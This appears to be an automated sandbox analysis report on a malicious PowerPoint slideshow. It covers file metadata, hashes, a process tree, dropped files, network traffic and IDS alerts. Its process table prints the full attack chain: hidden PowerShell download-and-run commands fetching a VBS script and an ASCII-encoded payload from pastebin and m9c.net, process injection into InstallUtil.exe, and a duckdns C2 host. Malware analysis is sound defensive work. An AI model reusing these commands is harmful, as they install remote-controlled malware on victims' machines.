Field | Value |
---|---|
File name | 745db86a63082c422777fb646723ab1d |
Full analysis | https://app.any.run/tasks/d0d3e481-8ad7-4233-9a8c-6f620e0670df |
Verdict | Malicious activity |
Analysis date | July 18, 2019, 03:38:23 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | application/vnd.ms-powerpoint |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Apresentação do PowerPoint, Author: Joselio Bonin, Last Saved By: Joselio Bonin, Revision Number: 5, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 12:18, Create Time/Date: Fri Jul 12 05:39:25 2019, Last Saved Time/Date: Fri Jul 12 05:55:02 2019, Number of Words: 0 |
MD5 | 745DB86A63082C422777FB646723AB1D |
SHA1 | 41864D39E704ADE8F560063B59B368C1031C3C40 |
SHA256 | 232F5AEB67A605446B4876AA000E202AEB2CC6BFEA17D9156A1B18CCAE3A4A00 |
SSDEEP | 384:QzEIIk/7G6wXpzRprR+HpExvYzCoiCg/:34/7G6GzRprRyOvXoiCg |

Extension | File type |
---|---|
.pps/ppt | Microsoft PowerPoint document (79.7) |

Field | Value |
---|---|
Title | Apresentação do PowerPoint |
Author | Joselio Bonin |
LastModifiedBy | Joselio Bonin |
RevisionNumber | 5 |
Software | Microsoft Office PowerPoint |
TotalEditTime | 12.3 minutes |
CreateDate | 2019:07:12 04:39:25 |
ModifyDate | 2019:07:12 04:55:02 |
Words | - |
ThumbnailClip | (Binary data 43336 bytes, use -b option to extract) |
CodePage | Windows Latin 1 (Western European) |
PresentationTarget | Widescreen |
Bytes | - |
Paragraphs | - |
Slides | 1 |
Notes | - |
HiddenSlides | - |
MMClips | - |
AppVersion | 16 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | |
HeadingPairs | |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
2864 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\admin\AppData\Local\Temp\745db86a63082c422777fb646723ab1d.pps" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft PowerPoint | 0 | 14.0.6009.1000 |
3172 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/DG0EBdFy','C:\Users\Public\AdobePDF.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | POWERPNT.EXE | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
3360 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs | C:\Windows\System32\cmd.exe | — | POWERPNT.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2452 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | TCP/IP Ping Command | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2544 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\AdobePDF.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385 |
2568 | Powershell $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,50,56,54,53,55,50,48,49,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,116,90,50,74,120,71,57,97,39,41,46,114,101,112,108,97,99,101,40,39,64,95,42,39,44,39,48,120,48,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,73,110,115,116,97,108,108,85,116,105,108,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)\|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | | wmiprvse.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2844 | cmd /c copy "C:\Users\Public\AdobePDF.vbs" "C:\Users\admin\AppData\Roaming" /Y | C:\Windows\system32\cmd.exe | — | wmiprvse.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
4048 | "{path}" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | | Powershell.exe | admin | Microsoft Corporation | MEDIUM | .NET Framework installation utility | — | 2.0.50727.5420 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2864 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVRBA09.tmp.cvr | — | — | — |
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K3VTZ5JYPF2CEIZFBNM9.temp | — | — | — |
2864 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DFAC6533C8D3F8FC8A.TMP | — | — | — |
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V26A6IYITX4U4ODUIFPJ.temp | — | — | — |
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 47388A8B771AD359484FBDBC4C2AF508 | 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
2844 | cmd.exe | C:\Users\admin\AppData\Roaming\AdobePDF.vbs | text | 58E9EFFFC903F66A3CC5263CA9BF905D | E073246A727D2F4B2A75E4D5FF1445DAFE703F88CF588203113B8616418DA971 |
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18072f.TMP | binary | 47388A8B771AD359484FBDBC4C2AF508 | 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
3172 | powershell.exe | C:\Users\Public\AdobePDF.vbs | text | 58E9EFFFC903F66A3CC5263CA9BF905D | E073246A727D2F4B2A75E4D5FF1445DAFE703F88CF588203113B8616418DA971 |
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 47388A8B771AD359484FBDBC4C2AF508 | 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17e0f9.TMP | binary | 47388A8B771AD359484FBDBC4C2AF508 | 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2568 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2568 | Powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3172 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2568 | Powershell.exe | 158.69.18.61:80 | www.m9c.net | OVH SAS | CA | malicious |
4048 | InstallUtil.exe | 152.246.81.100:6522 | microsoftoutlook.duckdns.org | TELEFÔNICA BRASIL S.A | BR | malicious |
— | — | 152.246.81.100:6522 | microsoftoutlook.duckdns.org | TELEFÔNICA BRASIL S.A | BR | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com | | shared |
www.m9c.net | | malicious |
microsoftoutlook.duckdns.org | | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |